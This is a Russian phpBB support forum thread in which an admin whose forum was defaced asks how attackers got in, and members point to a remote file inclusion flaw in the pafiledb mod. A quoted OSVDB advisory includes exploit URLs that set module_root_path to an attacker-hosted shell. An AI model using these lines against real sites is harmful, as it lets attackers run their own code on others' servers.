Уважаемые пользователи!
C 7 ноября 2020 года phpBB Group прекратила выпуск обновлений и завершила дальнейшее развитие phpBB версии 3.2.
С 1 августа 2024 года phpBB Group прекращает поддержку phpBB 3.2 на официальном сайте.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до 31 декабря 2024 года.
С учетом этого, настоятельно рекомендуется обновить конференции до версии 3.3.

Взломали форум

Проблемы с установкой или работой phpBB 2.0.x? Ищите ответы здесь!
Аватара пользователя
Neonaft
phpBB 1.4.4
Сообщения: 114
Стаж: 18 лет 2 месяца
Контактная информация:

Взломали форум

Сообщение Neonaft »

Ребят, уже стандартная ситуация, взломали форум, удаляя файлы index.php и вставляя свой index.htm.

Уже который раз взламывают, так в этот раз написали вот что в индексе:

Own3d By PoisoN SaN 100% MeXiCaNo
www.diosdelared.com/foro

SaLuDoS A FiNcH ( JazmiN ) ESPECIALMENTE :)

ADMIN FUCK OFF YOUR BUG IS IN..

http://www.forum.pedis.ru//pafiledb/inc ... root_path=
REMOTE FILE INCLUSION ( RFI )

Я так понял, что они дали подсказку, через что сломали.

Подскажите плиз, что и где залатать....[/i]
Аватара пользователя
Rayden
Former team member
Сообщения: 3739
Стаж: 18 лет 9 месяцев
Поблагодарили: 44 раза
Контактная информация:

Сообщение Rayden »

Тут заполнить шаблон запроса, а у себя восстанавливать.
phpBB2 FAQ
phpBB3 FAQ
Аватара пользователя
Neonaft
phpBB 1.4.4
Сообщения: 114
Стаж: 18 лет 2 месяца
Контактная информация:

Сообщение Neonaft »

Дело в том, что неизвестно, уловка ли это либо хакеры реально указали на дыру в системе...

Хотелось бы узнать правда ли это и за определённую цену проверить на дырявость сайт.
Аватара пользователя
rxu
phpBB Guru
phpBB Guru
Сообщения: 16354
Стаж: 17 лет 11 месяцев
Откуда: Красноярск
Благодарил (а): 535 раз
Поблагодарили: 2134 раза
Контактная информация:

Сообщение rxu »

Логи. Смотрите, через какой скрипт ломали.
Изображение
Аватара пользователя
Rayden
Former team member
Сообщения: 3739
Стаж: 18 лет 9 месяцев
Поблагодарили: 44 раза
Контактная информация:

Сообщение Rayden »

Блин, ну скажи "по щучьему велению..."
Ты просто поплакаться пришел или за советом?
Ты читать усмеешь? ЗАПОЛНИ ШАБЛОН ЗАПРОСА.
Поверь, ни у кого нет желания сорок минут выпыттывать у тебя - какая версия, какие моды стоят и т д...
phpBB2 FAQ
phpBB3 FAQ
Аватара пользователя
Master of Tragedy
phpBB 1.4.2
Сообщения: 68
Стаж: 16 лет 8 месяцев
Откуда: Санкт-Петербург
Контактная информация:

Сообщение Master of Tragedy »

Скорее всего дыра у хостера, а не у вас...
Ce grand malheur de ne pouvoir etre seul...
Gosudar
phpBB 2.0.0
Сообщения: 227
Стаж: 18 лет 9 месяцев
Контактная информация:

Сообщение Gosudar »

О , господи, даже написали:
httpafiledb_constants.php?module_root_path=
Вот она дыра....
Блин, здесь на форуме, есть тема по моду pafiledb там и как защититься есть.
Аватара пользователя
Neonaft
phpBB 1.4.4
Сообщения: 114
Стаж: 18 лет 2 месяца
Контактная информация:

Сообщение Neonaft »

На счёт уязвимостей - всё не то.
Я просто не понимаю, где именно в этом файле дыра.
Прикрепляю файл к посту... Плиз, помогите...
Вложения
pafiledb_constants.rar
(1.67 КБ) 266 скачиваний
Аватара пользователя
Rayden
Former team member
Сообщения: 3739
Стаж: 18 лет 9 месяцев
Поблагодарили: 44 раза
Контактная информация:

Сообщение Rayden »

Master of Tragedy
С чего такие выводы?
phpBB2 FAQ
phpBB3 FAQ
Аватара пользователя
rxu
phpBB Guru
phpBB Guru
Сообщения: 16354
Стаж: 17 лет 11 месяцев
Откуда: Красноярск
Благодарил (а): 535 раз
Поблагодарили: 2134 раза
Контактная информация:

Сообщение rxu »

Neonaft писал(а):Я просто не понимаю, где именно в этом файле дыра.
paFileDB pafiledb_constants.php module_root_path Variable Remote File Inclusion
OSVDB ID: 25507
Disclosure Date: May 9, 2006

Description:

paFileDB contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to includes/pafiledb_constants.php not properly sanitizing user input supplied to the "module_root_path" variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Vulnerability Classification:
Remote/Network Access Required
Input Manipulation
Loss Of Integrity
Exploit Available
Web Related

Products:
mxBB Portal paFileDB Unknown or Unspecified

Solution:

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Manual Testing Notes:

http://[target]/[phpBBpath]/[pafiledbpath]/includes/pafiledb_constants.php?module_root_path=http://[attacker]
Exploit: http://[site]/[path]/modules/mx_pafiledb/pafiledb/includes/pafiledb_constants.php?module_root_path=[Shell]
Изображение
Аватара пользователя
Neonaft
phpBB 1.4.4
Сообщения: 114
Стаж: 18 лет 2 месяца
Контактная информация:

Сообщение Neonaft »

Неужели нет решений?

Может, можно как-то ограничить от внешних воздействий этот файл? За что он вообще отвечает?

Кто-нибудь сможет взяться за деньги залатать дыры в этом моде?
Gosudar
phpBB 2.0.0
Сообщения: 227
Стаж: 18 лет 9 месяцев
Контактная информация:

Сообщение Gosudar »

Neonaft
На счёт этой дыры отпиал в личку.
Аватара пользователя
rxu
phpBB Guru
phpBB Guru
Сообщения: 16354
Стаж: 17 лет 11 месяцев
Откуда: Красноярск
Благодарил (а): 535 раз
Поблагодарили: 2134 раза
Контактная информация:

Сообщение rxu »

Neonaft
На запрос pafiledb vulnerability гугл выдаёт столько, что навряд ли кто-то возьмётся залатать всё, имхо.
Изображение
Gosudar
phpBB 2.0.0
Сообщения: 227
Стаж: 18 лет 9 месяцев
Контактная информация:

Сообщение Gosudar »

Ну если надо, то в принципе можно.
Надеюсь, что у себя всё пофиксил...

Там половина, даже больше, уязвимостей от оригинального скрипта pafiledb, а не от мода
Аватара пользователя
Neonaft
phpBB 1.4.4
Сообщения: 114
Стаж: 18 лет 2 месяца
Контактная информация:

Сообщение Neonaft »

Gosudar, также написал тебе в личку. Надеюсь на сотрудничество.

А вообще нужны люди, кто сможет за деньги проверить основные дыры на форуме и залатать их.
Закрыто

Вернуться в «Поддержка phpBB 2.0.x»